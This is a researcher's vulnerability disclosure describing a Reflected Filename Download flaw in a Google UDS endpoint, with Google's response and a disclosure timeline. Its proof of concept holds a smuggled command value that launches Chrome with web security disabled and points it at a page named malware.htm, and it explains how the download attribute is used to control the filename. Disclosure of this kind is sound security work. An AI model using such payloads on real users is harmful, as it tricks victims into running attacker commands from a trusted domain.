Reflected Filename Download on Google

WS201510 - Reflected Filename Download on Google
by David Sopas @dsopas
www.websegura.net

Description:

I found a Reflected Filename Download on Google API - Google UDS [User Distributed Search].
For me it was a challenge and a pleasure to find this because so far I only discovered Reflected Filename Download vulnerabilities in JSON files.
People need to consider that RFD is not a JSON issue.
You can find these type of vulnerabilities in other types too - like this one on Javascript.

The security issue is located at:

https://www.google.com/uds/?file=gdata&v=1.x

And here:

https://adwords.google.com/uds/?file=dont_exists&v=1.x

Where you can inject and manipulate the response using the file variable.
The problem is that even if the file/module don’t exists it returns HTTP code 200.

https://www.google.com/uds/?file=dont_exists&v=1.x

var error = new Error(“Module: ‘dont_exists’ not found!”);
error.toString = function() { return this.message; }
throw error;

google_rfd_01

Proof-of-concept:

Reflecting URL variables with HTTP code 200 is not always a good idea and gave me the opportunity to issue a RFD attack.

var error = new Error(“Module: ‘gdata\”||start chrome websegura.net\/malware.htm -disable-web-security -disable-popup-blocking||’ not found!”);
error.toString = function() { return this.message; }
throw error;

So the Reflected part is done. Now I only need to control the filename. Due to filename restritions on the Google path I need to use HTML5 A DOWNLOAD attribute to do this. Due to this situation “only” the following browsers are supported:

- Chrome
- Opera
- Android Browser
- Chrome for Android
- Firefox [forcing the user to “Save Link As” - done with simple javascript return:false;]

What this RFD attack will do is when the user click on the download link will get a file supposed to be on Google.com [a trusted domain] gaining credibility from the victim.

google_rfd_02
google_rfd_03

Google replied:

The reward panel reviewed this finding and decided that it does not meet the bar for a financial reward, but we would like to acknowledge your contribution
to Google security in our Hall of Fame. A general perspective on the issue is shared here: http://lcamtuf.blogspot.com/2014/03/messing-around-with-download.html
That said, we do appreciate your report and would like to add you to our Hall of Fame available at the following URL:

This didn’t got me any bounty but they were nice enough to give me a Honorable Mention - my second one :)

Timeline:

16 Mar 15 - Submited to Google
18 Mar 15 - Google filed the bug
07 Apr 15 - Google replied
08 Apr 15 - Full disclosure

Achaste interessante? Partilha!